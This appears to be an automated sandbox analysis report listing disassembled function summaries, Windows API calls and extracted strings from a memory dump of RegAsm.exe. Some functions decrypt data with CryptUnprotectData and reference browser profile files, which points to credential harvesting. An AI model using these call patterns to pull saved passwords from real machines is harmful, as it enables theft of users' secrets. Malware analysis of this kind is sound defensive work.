                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                          • String ID:
                                          • API String ID: 1828521557-0
                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                          APIs
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@FilePointermemcpy
                                          • String ID:
                                          • API String ID: 609303285-0
                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID:
                                          • API String ID: 2081463915-0
                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                          APIs
                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastRead
                                          • String ID:
                                          • API String ID: 2136311172-0
                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                          APIs
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                          • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                          • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                          • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                          • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                          APIs
                                          • EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • GetLastError.KERNEL32 ref: 0040995D
                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                          • GetLastError.KERNEL32 ref: 00409974
                                          • CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                          • String ID:
                                          • API String ID: 3604893535-0
                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                          APIs
                                          • EmptyClipboard.USER32 ref: 00409882
                                          • wcslen.MSVCRT ref: 0040988F
                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                          • CloseClipboard.USER32 ref: 004098D7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                          • String ID:
                                          • API String ID: 1213725291-0
                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                          APIs
                                          • GetLastError.KERNEL32 ref: 004182D7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                          • LocalFree.KERNEL32(?), ref: 00418342
                                          • free.MSVCRT ref: 00418370
                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                          • String ID: OsError 0x%x (%u)
                                          • API String ID: 2360000266-2664311388
                                          • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                          • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 004022A6
                                          • _wcsicmp.MSVCRT ref: 004022D7
                                          • _wcsicmp.MSVCRT ref: 00402305
                                          • _wcsicmp.MSVCRT ref: 00402333
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                          • memset.MSVCRT ref: 0040265F
                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                          • API String ID: 2257402768-1134094380
                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                          • String ID: :stringdata$ftp://$http://$https://
                                          • API String ID: 2787044678-1921111777
                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                          • GetDC.USER32 ref: 004140E3
                                          • wcslen.MSVCRT ref: 00414123
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                          • _snwprintf.MSVCRT ref: 00414244
                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 2080319088-3046471546
                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 00413221
                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                          • memset.MSVCRT ref: 00413292
                                          • memset.MSVCRT ref: 004132B4
                                          • memset.MSVCRT ref: 004132CD
                                          • memset.MSVCRT ref: 004132E1
                                          • memset.MSVCRT ref: 004132FB
                                          • memset.MSVCRT ref: 00413310
                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                          • memset.MSVCRT ref: 004133C0
                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                          • wcscpy.MSVCRT ref: 0041341F
                                          • _snwprintf.MSVCRT ref: 0041348E
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                          • SetFocus.USER32(00000000), ref: 004134B7
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                          • {Unknown}, xrefs: 004132A6
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                          • SetCursor.USER32(00000000), ref: 0040129E
                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                          • EndDialog.USER32(?,?), ref: 0040135E
                                          • DeleteObject.GDI32(?), ref: 0040136A
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                          • ShowWindow.USER32(00000000), ref: 00401398
                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                          • String ID:
                                          APIs
                                          • memset.MSVCRT ref: 00404172
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 004041D6
                                          • wcscpy.MSVCRT ref: 004041E7
                                          • memset.MSVCRT ref: 00404200
                                          • memset.MSVCRT ref: 00404215
                                          • _snwprintf.MSVCRT ref: 0040422F
                                          • wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 0040426E
                                          • memset.MSVCRT ref: 004042CD
                                          • memset.MSVCRT ref: 004042E2
                                          • _snwprintf.MSVCRT ref: 004042FE
                                          • wcscpy.MSVCRT ref: 00404311
                                          Similarity
                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                          APIs
                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                          Similarity
                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                          APIs
                                          Similarity
                                          • API ID: _snwprintf$memset$wcscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          APIs
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                          Similarity
                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • free.MSVCRT ref: 0040E49A
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
